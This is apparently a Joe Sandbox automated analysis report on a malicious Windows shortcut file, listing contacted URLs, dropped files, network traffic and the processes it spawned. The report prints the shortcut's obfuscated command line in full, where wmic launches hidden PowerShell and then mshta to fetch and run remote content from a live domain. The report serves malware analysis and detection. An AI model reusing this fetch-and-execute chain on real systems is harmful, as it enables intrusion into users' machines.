    https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000D.00000003.1339721621.0000029E1A770000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.drfalse
      high
      http://crl.ver)svchost.exe, 0000000D.00000002.2494814956.0000029E1AA00000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        https://nins.in/powersearchqueer$global:?powershell.exetrue
        • Avira URL Cloud: safe
        unknown
        https://nins.in/powersearchqueer...mshta.exe, 00000007.00000002.2492262200.00000245A56DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A56DB000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://nins.in/powersearchqueer-Wmshta.exe, 00000007.00000002.2492262200.00000245A5687000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A5687000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://nins.in/powersearchqueerMmshta.exe, 00000007.00000002.2491924278.00000245A55B0000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://nins.in/powersearchqueerKmshta.exe, 00000007.00000002.2492262200.00000245A5618000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://nins.in/powersearchqueerk-jspark_init.phpINetCookiesrmshta.exe, 00000007.00000002.2492262200.00000245A5687000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://g.live.com/odclientsettings/Prod1C:qmgr.db.13.drfalse
          high
          https://nins.in/powersearchqueerHmshta.exe, 00000007.00000002.2493252687.00000245A6FD0000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://cdn.jsinit.directfwd.com/sk-jspark_init.phpsqmshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          http://crl.micromshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://nins.in/powersearchqueerON=8f089WMIC.exe, 00000000.00000002.1250128623.000001BED3500000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://nins.in/powersearchqueerC:mshta.exe, 00000007.00000002.2492262200.00000245A5610000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://cdn.jsinit.directfwd.com/sk-jspark_init.phpSWmshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            https://nins.in/mshta.exe, 00000007.00000002.2492262200.00000245A5687000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A5687000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.2494779872.0000024DA8170000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://nins.in/powersearchqueerveEventtmshta.exe, 00000007.00000002.2492262200.00000245A5687000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A5687000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://nins.in/powersearchqueer9mshta.exe, 00000007.00000002.2491101133.0000007E70AF6000.00000004.00000010.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://nins.in/powersearchqueerymshta.exe, 00000007.00000002.2492262200.00000245A564A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A564D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://nins.in/powersearchqueerxmshta.exe, 00000007.00000002.2492262200.00000245A5618000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://cdn.jsinit.directfwd.com/sk-jspark_init.phpHistoryHistory.IE5mshta.exe, 00000007.00000002.2492262200.00000245A564A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A564D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            https://nins.in/powersearchqueer3mshta.exe, 00000007.00000002.2492262200.00000245A5638000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://cdn.jsinit.directfwd.com/mshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.2492262200.00000245A564A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A564D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            https://nins.in/powersearchqueer0mshta.exe, 00000007.00000002.2492262200.00000245A5618000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://nins.in/powersearchqueer/mshta.exe, 00000007.00000002.2492262200.00000245A564A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A564D000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://cdn.jsinit.directfwd.com/sk-jspark_init.phpAWmshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            216.10.240.70
            nins.inIndia
            394695PUBLIC-DOMAIN-REGISTRYUStrue
            IP
            127.0.0.1
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1571236
            Start date and time:2024-12-09 07:21:47 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 18s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:18
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:s0zqlmETpm.lnk
            renamed because original name is a hash value
            Original Sample Name:26e702394de8882a3df671705bc3367b.lnk
            Detection:MAL
            Classification:mal96.evad.winLNK@7/8@4/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .lnk
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 23.218.208.109
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            01:22:40API Interceptor1x Sleep call for process: WMIC.exe modified
            01:22:49API Interceptor2x Sleep call for process: svchost.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            216.10.240.70h0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
              Microsoft Fax.htmGet hashmaliciousHTMLPhisherBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                nins.inh0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
                • 216.10.240.70
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                PUBLIC-DOMAIN-REGISTRYUSQuote_8714.exeGet hashmaliciousAgentTeslaBrowse
                • 199.79.62.115
                S1a5ZF3ytp.vbsGet hashmaliciousGuLoaderBrowse
                • 103.53.42.63
                List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                • 103.53.42.63
                List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                • 103.53.42.63
                h0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
                • 216.10.240.70
                Ti5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 119.18.54.39
                m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                • 208.91.199.223
                PO82200487.exeGet hashmaliciousAgentTeslaBrowse
                • 199.79.62.115
                ORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
                • 199.79.62.115
                QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                • 199.79.62.115
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e19gorkmTnChA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 216.10.240.70
                esetonlinescanner.exeGet hashmaliciousUnknownBrowse
                • 216.10.240.70
                esetonlinescanner.exeGet hashmaliciousUnknownBrowse
                • 216.10.240.70
                h0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
                • 216.10.240.70
                vzHOEzLbDj.exeGet hashmaliciousUnknownBrowse
                • 216.10.240.70
                WaveExecutor.exeGet hashmaliciousUnknownBrowse
                • 216.10.240.70
                Nexus-Executor.exeGet hashmaliciousUnknownBrowse
                • 216.10.240.70
                WaveExecutor.exeGet hashmaliciousUnknownBrowse
                • 216.10.240.70
                Nexus-Executor.exeGet hashmaliciousUnknownBrowse
                • 216.10.240.70
                Xeno Executor.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                • 216.10.240.70
                No context
                Process:C:\Windows\System32\svchost.exe
                File Type:data
                Category:dropped
                Size (bytes):1310720
                Entropy (8bit):0.7067154203590912
                Encrypted:false
                SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqs:2JIB/wUKUKQncEmYRTwh0A
                MD5:698B30796FD51899D71C0C72E9F08418
                SHA1:EFE4B0A5833F24DE4CCFB04A1864498E95B83592
                SHA-256:AE1A0D0CDB2147B6EFEAC4013F953EDCEB45F21312D67B01C54EB558219BBBE2
                SHA-512:BA2407368B74953356C3CE4B33E9B3ECAC4653C4B9A1A0FB7014E32F9E373B4162693791F7D3DEF0ECD751F709E4621DA7C00A238E481684CC326178CBAF5D3E
                Malicious:false
                Reputation:low
                Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                Process:C:\Windows\System32\svchost.exe
                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x4795d088, page size 16384, DirtyShutdown, Windows version 10.0
                Category:dropped
                Size (bytes):1310720
                Entropy (8bit):0.790015020328645
                Encrypted:false
                SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
                MD5:C094BD5AF7B419890F89E4EB1928DCCD
                SHA1:6FA2C9536DDD89A9FA40F38AE2288B5868621620
                SHA-256:7E04EEE8B53BB5BA2ED15468692F3BFA0A4D07F7A9191244D5768C7642CB49FD
                SHA-512:A1AC64D646BFD69C93252954587158D7826D0575F357C010521EB83B7EE0B78FBA0CAA92D3BE8B3BE344CB0262303B7725DFC764E325B6DCC825818E72F7AAC9
                Malicious:false
                Reputation:low
                Preview:G..... ...............X\...;...{......................0.`.....42...{5.1....|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................bsG1....|....................8.1....|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\System32\svchost.exe
                File Type:data
                Category:dropped
                Size (bytes):16384
                Entropy (8bit):0.08216274514660313
                Encrypted:false
                SSDEEP:3:OtyYejwY1t/57Dek3JOXj5l/ollEqW3l/TjzzQ/t:lzjwYHR3tOXnAmd8/
                MD5:2FF4BFEBFEDC75816A0249EFCFAFFFB9
                SHA1:D070CBE91981BF739C7DC629AB84775D6905BD2B
                SHA-256:BA80A51EE0D7DF35FF73AE33A7DF806CCD62B3F68EBF9600CAE5AE4BBD901409
                SHA-512:0B061AF65A15B241CECE8D62EC9321951674AC4B4DE076A7CD1417A86B6E02BA01FA25FDBBB4CC14D8CEA7055D40713183C325AE1A6AA2A1A726C6E5B3BB8246
                Malicious:false
                Reputation:low
                Preview:./.......................................;...{..1....|..42...{5.........42...{5.42...{5...Y.42...{59..................8.1....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):0.7307872139132228
                Encrypted:false
                SSDEEP:3:NlllulF/ll:NllUNll
                MD5:1B9939B408D57BA3B6D8F82BB4B3A3C3
                SHA1:63CCC77CB41EF1BD526EFB37D499AB0BB7EB0446
                SHA-256:ADB9EEF918193307CF7A4935A6DA1A213F8CF051A09445E8E5F790613770A13C
                SHA-512:9B6317B0773EF501013A1337BB7230C164D719130DF7564BF7AC754BB288164FFFEC01DA98C1294F793453B5259F28AA2A5A9725702353F623E0016C20A23949
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:@...e...........................................................
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\svchost.exe
                File Type:JSON data
                Category:dropped
                Size (bytes):55
                Entropy (8bit):4.306461250274409
                Encrypted:false
                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                MD5:DCA83F08D448911A14C22EBCACC5AD57
                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                Malicious:false
                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                Process:C:\Windows\System32\wbem\WMIC.exe
                File Type:ASCII text, with CRLF, CR line terminators
                Category:dropped
                Size (bytes):160
                Entropy (8bit):5.095703110114614
                Encrypted:false
                SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgkKIFJQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/egkheAin
                MD5:B0BA43D3B2627628AA304E3C5A4DBCD1
                SHA1:F736EA3416CED17CE86C1EB8B8E8114E0CC7C565
                SHA-256:C05823485E8898CABA98473D5F7A8FE712A387D21732B9DA7D8778397758D2B4
                SHA-512:433ACE554A84AE38121D47671B3B133FECF460E82B3BE08CB602E4D9E031769656FB85BC01E5A92FFB3903C353D65F3237C8B62263EF1D2A7241AE2A9B1B0183
                Malicious:false
                Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6752;...ReturnValue = 0;..};....
                File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                Entropy (8bit):1.7803766403826797
                TrID:
                • Windows Shortcut (20020/1) 100.00%
                File name:s0zqlmETpm.lnk
                File size:2'860 bytes
                MD5:26e702394de8882a3df671705bc3367b
                SHA1:5bc807593b07922cb43189331cb4e216b34fedce
                SHA256:9392ba6607494f23e5979d7bf6be8519ab8aa7e0377fe9aeb02987aa8521a488
                SHA512:ea5fb3bee6aa24ee0c47c711453f666b3e10a2259c3c99c8c2f3929aba05a3c3dc9029ed01817ffafe1683687b9a22e9b1d7251769acfdc62a7bc96f4772b018
                SSDEEP:24:8AyH/BUlgKN4eH+/3mkWNBvLquA/qdd79dsHLIQ:89uGeAmlBzquAidJ9
                TLSH:CD515C146BE51B10F3B6CE32587AB3218A7B7C4BDD128F1D018145891432610FC75F6B
                File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                Icon Hash:72d282828e8d8dd5

                General

                Relative Path:..\..\..\Windows\System32\Wbem\wmic.exe
                Command Line Argument:process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer"
                Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                TimestampSource PortDest PortSource IPDest IP
                Dec 9, 2024 07:22:47.051629066 CET49699443192.168.2.7216.10.240.70
                Dec 9, 2024 07:22:47.051665068 CET44349699216.10.240.70192.168.2.7
                Dec 9, 2024 07:22:47.051748037 CET49699443192.168.2.7216.10.240.70
                Dec 9, 2024 07:22:47.059880018 CET49699443192.168.2.7216.10.240.70
                Dec 9, 2024 07:22:47.059894085 CET44349699216.10.240.70192.168.2.7
                Dec 9, 2024 07:22:48.850275993 CET44349699216.10.240.70192.168.2.7
                Dec 9, 2024 07:22:48.850380898 CET49699443192.168.2.7216.10.240.70
                Dec 9, 2024 07:22:48.911714077 CET49699443192.168.2.7216.10.240.70
                Dec 9, 2024 07:22:48.911741018 CET44349699216.10.240.70192.168.2.7
                Dec 9, 2024 07:22:48.912110090 CET44349699216.10.240.70192.168.2.7
                Dec 9, 2024 07:22:48.912204981 CET49699443192.168.2.7216.10.240.70
                Dec 9, 2024 07:22:48.913800955 CET49699443192.168.2.7216.10.240.70
                Dec 9, 2024 07:22:48.959340096 CET44349699216.10.240.70192.168.2.7
                Dec 9, 2024 07:22:49.740854979 CET44349699216.10.240.70192.168.2.7
                Dec 9, 2024 07:22:49.740931034 CET44349699216.10.240.70192.168.2.7
                Dec 9, 2024 07:22:49.740971088 CET49699443192.168.2.7216.10.240.70
                Dec 9, 2024 07:22:49.741014957 CET49699443192.168.2.7216.10.240.70
                Dec 9, 2024 07:22:49.749834061 CET49699443192.168.2.7216.10.240.70
                Dec 9, 2024 07:22:49.749872923 CET44349699216.10.240.70192.168.2.7
                TimestampSource PortDest PortSource IPDest IP
                Dec 9, 2024 07:22:44.709211111 CET5549253192.168.2.71.1.1.1
                Dec 9, 2024 07:22:45.798475027 CET5549253192.168.2.71.1.1.1
                Dec 9, 2024 07:22:46.811029911 CET5549253192.168.2.71.1.1.1
                Dec 9, 2024 07:22:47.045363903 CET53554921.1.1.1192.168.2.7
                Dec 9, 2024 07:22:47.045377970 CET53554921.1.1.1192.168.2.7
                Dec 9, 2024 07:22:47.045387030 CET53554921.1.1.1192.168.2.7
                Dec 9, 2024 07:22:49.757525921 CET6261753192.168.2.71.1.1.1
                Dec 9, 2024 07:22:50.563993931 CET53626171.1.1.1192.168.2.7
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Dec 9, 2024 07:22:44.709211111 CET192.168.2.71.1.1.10x298bStandard query (0)nins.inA (IP address)IN (0x0001)false
                Dec 9, 2024 07:22:45.798475027 CET192.168.2.71.1.1.10x298bStandard query (0)nins.inA (IP address)IN (0x0001)false
                Dec 9, 2024 07:22:46.811029911 CET192.168.2.71.1.1.10x298bStandard query (0)nins.inA (IP address)IN (0x0001)false
                Dec 9, 2024 07:22:49.757525921 CET192.168.2.71.1.1.10x3507Standard query (0)cdn.jsinit.directfwd.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Dec 9, 2024 07:22:47.045363903 CET1.1.1.1192.168.2.70x298bNo error (0)nins.in216.10.240.70A (IP address)IN (0x0001)false
                Dec 9, 2024 07:22:47.045377970 CET1.1.1.1192.168.2.70x298bNo error (0)nins.in216.10.240.70A (IP address)IN (0x0001)false
                Dec 9, 2024 07:22:47.045387030 CET1.1.1.1192.168.2.70x298bNo error (0)nins.in216.10.240.70A (IP address)IN (0x0001)false
                • nins.in
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.749699216.10.240.704431424C:\Windows\System32\mshta.exe
                TimestampBytes transferredDirectionData
                2024-12-09 06:22:48 UTC327OUTGET /powersearchqueer HTTP/1.1
                Accept: */*
                Accept-Language: en-CH
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: nins.in
                Connection: Keep-Alive
                2024-12-09 06:22:49 UTC261INHTTP/1.1 404 Not Found
                Date: Mon, 09 Dec 2024 06:22:49 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Thu, 09 Sep 2021 08:21:58 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2024-12-09 06:22:49 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:01:22:39
                Start date:09/12/2024
                Path:C:\Windows\System32\wbem\WMIC.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer"
                Imagebase:0x7ff6c6320000
                File size:576'000 bytes
                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:01:22:39
                Start date:09/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:01:22:40
                Start date:09/12/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer
                Imagebase:0x7ff741d30000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:01:22:40
                Start date:09/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:7
                Start time:01:22:42
                Start date:09/12/2024
                Path:C:\Windows\System32\mshta.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\mshta.exe" https://nins.in/powersearchqueer
                Imagebase:0x7ff638c40000
                File size:14'848 bytes
                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:false

                Target ID:13
                Start time:01:22:49
                Start date:09/12/2024
                Path:C:\Windows\System32\svchost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Imagebase:0x7ff7b4ee0000
                File size:55'320 bytes
                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                No disassembly